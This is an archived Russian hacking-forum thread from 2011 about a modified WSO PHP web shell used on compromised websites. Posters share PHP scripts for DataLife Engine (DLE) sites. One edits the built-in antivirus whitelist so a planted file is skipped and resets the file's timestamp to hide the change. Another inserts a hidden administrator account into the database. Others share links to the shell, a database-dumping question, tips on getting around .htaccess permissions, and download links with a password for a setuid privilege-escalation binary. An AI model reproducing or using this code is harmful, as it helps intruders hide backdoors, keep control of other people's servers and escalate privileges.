ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
05.11.2011, 17:09
|
|
Guest
Сообщений: n/a
Провел на форуме:
40748
Репутация:
78
|
|
Делал модификацию под себя, за основу взял последнюю версию WSO, и все же решил выложить, так как многим эта опция нужна.
Добавлена опция дампа определенных колонок таблиц.
Скриншот:
Код на pastebin.com: http://pastebin.com/WvZTc46s |
|
|
|
07.11.2011, 12:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
611
Репутация:
0
|
|
В WSO из первого поста есть ошибка в параметрах:
Сообщение от None
var c_ = '" . htmlspecialchars($GLOBALS['cwd']) . "';
var a_ = '" . htmlspecialchars(@$_POST['a']) ."'
var charset_ = '" . htmlspecialchars(@$_POST['charset']) ."';
var
p1_
= '" . ((strpos(@$_POST['p1'],"\n")!==false)?'':htmlspecialchars($_POST['p1'],ENT_QUOTES)) ."';
var
p1_
= '" . ((strpos(@$_POST['p2'],"\n")!==false)?'':htmlspecialchars($_POST['p2'],ENT_QUOTES)) ."';
var p3_ = '" . ((strpos(@$_POST['p3'],"\n")!==false)?'':htmlspecialchars($_POST['p3'],ENT_QUOTES)) ."';
Правьте)
Готовый запакованный вариант: http://pastebin.com/7fn3hebC |
|
|
|
07.11.2011, 13:51
|
|
Guest
Сообщений: n/a
Провел на форуме:
19136
Репутация:
0
|
|
Прошу больно не пинать, вопрос скорей не по шеллу, а по выполнению в шелле php скриптов..
Мне часто "попадаются" сайты на движке DLE, поэтому замутил для себя несколько простеньких скриптов для экономия времени..
Прячем файлы от встроенного антивируса:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//AV hide
[/COLOR][COLOR="#0000BB"]$antivir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'../ajax/antivirus.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$time_create[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]filemtime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$antivir[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$antivir[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$antivir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'"./engine/inc/search.php",'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'"./engine/inc/search.php",
"./engine/ajax/view.php",'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]touch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$antivir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$time_create[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]"AV - ok :)"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// end //[/COLOR][/COLOR]
Создаём админа
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//adm
[/COLOR][COLOR="#0000BB"]ob_start[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DATALIFEENGINE"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"]);
include([/COLOR][COLOR="#DD0000"]"../classes/mysql.class.php"[/COLOR][COLOR="#007700"]);
include([/COLOR][COLOR="#DD0000"]"dbconfig.php"[/COLOR][COLOR="#007700"]);
include([/COLOR][COLOR="#DD0000"]"config.php"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DBHOST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]DBUSER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]DBPASS[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DBNAME[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]set_time_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$update[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users` ( `email` , `password` , `name`, `user_group` ) VALUES ('my@mail.com', '14e1b600b1fd579f47433b88e8d85291', 'adm', '1')"[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]"adm in DB - ok :)"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// end //[/COLOR][/COLOR]
и много других...
Как все эти скрипты реализовать в одном?
Т.е. выполнился первый, если выдал результат "ок" - переходим ко второму и т.д.
Если произошла ошибка - останавливаем и выводим на экран..
Знаю что реализуется условиями, но не пойму как сделать. Пых начал изучать недавно... |
|
|
|
18.11.2011, 19:36
|
|
Guest
Сообщений: n/a
Провел на форуме:
149611
Репутация:
81
|
|
Сообщение от spiderbuber
spiderbuber said:
Прошу больно не пинать, вопрос скорей не по шеллу, а по выполнению в шелле php скриптов..
Мне часто "попадаются" сайты на движке DLE, поэтому замутил для себя несколько простеньких скриптов для экономия времени..
Прячем файлы от встроенного антивируса:
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//AV hide
[/COLOR][COLOR="#0000BB"]$antivir[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]'../ajax/antivirus.php'[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$time_create[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]filemtime[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$antivir[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file_get_contents[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$antivir[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]fopen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$antivir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'w'[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]'"./engine/inc/search.php",'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'"./engine/inc/search.php",
"./engine/ajax/view.php",'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fwrite[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]fclose[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$file[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$res[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]touch[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$antivir[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$time_create[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]"AV - ok :)"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// end //[/COLOR][/COLOR]
Создаём админа
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]//adm
[/COLOR][COLOR="#0000BB"]ob_start[/COLOR][COLOR="#007700"]();
[/COLOR][COLOR="#0000BB"]define[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"DATALIFEENGINE"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"1"[/COLOR][COLOR="#007700"]);
include([/COLOR][COLOR="#DD0000"]"../classes/mysql.class.php"[/COLOR][COLOR="#007700"]);
include([/COLOR][COLOR="#DD0000"]"dbconfig.php"[/COLOR][COLOR="#007700"]);
include([/COLOR][COLOR="#DD0000"]"config.php"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_connect[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DBHOST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]DBUSER[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]DBPASS[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]DBNAME[/COLOR][COLOR="#007700"]);
@[/COLOR][COLOR="#0000BB"]set_time_limit[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$update[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO `"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]PREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"_users` ( `email` , `password` , `name`, `user_group` ) VALUES ('my@mail.com', '14e1b600b1fd579f47433b88e8d85291', 'adm', '1')"[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]"adm in DB - ok :)"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#FF8000"]// end //[/COLOR][/COLOR]
и много других...
Как все эти скрипты реализовать в одном?
Т.е. выполнился первый, если выдал результат "ок" - переходим ко второму и т.д.
Если произошла ошибка - останавливаем и выводим на экран..
Знаю что реализуется условиями, но не пойму как сделать. Пых начал изучать недавно... Может, это сойдёт?
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]DLE[/COLOR][COLOR="#007700"]()
{
...
}
if([/COLOR][COLOR="#0000BB"]DLE[/COLOR][COLOR="#007700"]())
{
echo[/COLOR][COLOR="#DD0000"]"ok"[/COLOR][COLOR="#007700"];
}
else{
echo[/COLOR][COLOR="#DD0000"]"Fffuu"[/COLOR][COLOR="#007700"];
}[/COLOR][/COLOR]
|
|
|
|
23.11.2011, 00:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
12527
Репутация:
10
|
|
Классный шелл!
Заливаю только этот шелл так как другие далеко позади!
|
|
|
|
26.11.2011, 19:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
178623
Репутация:
94
|
|
Как сделать дамп БД через этот шелл?
|
|
|
|
27.11.2011, 18:53
|
|
Guest
Сообщений: n/a
Провел на форуме:
225312
Репутация:
-6
|
|
как отредактировать .htaccess через wso ? нехватает прав как быть какие есть варианты обхода помогите
|
|
|
|
05.12.2011, 06:55
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
ссылка сдохла!
скиньте ещё раз Скомпилированный суидник плз!
и появилась ещё проблемка,после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!
в чём может быть проблемма?
|
|
|
|
05.12.2011, 07:56
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
Сообщение от Faaax
Faaax said:
ссылка сдохла!
скиньте ещё раз Скомпилированный суидник плз!
и появилась ещё проблемка,после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!
в чём может быть проблемма?
Самому не скомпилить чтоли?
1) Просто суидник: http://www.sendspace.com/file/hgwwez
2) Суидник собранный со -static: http://www.sendspace.com/file/gmeycj
Пасс на судник: 112s233
Использование: ./suid 112s233 'uname -a; id'
|
|
|
05.12.2011, 08:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
124363
Репутация:
11
|
|
да уже скомпилил!
но вот следующий вопрос остаётся открытым!
после того как прописал всё суид,пасс,всё прошло,но когда нажал на YES,то сервер лёг сразу,не открывает не один сайт!
в чём может быть проблемма?
серв до сих пор лежит!
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
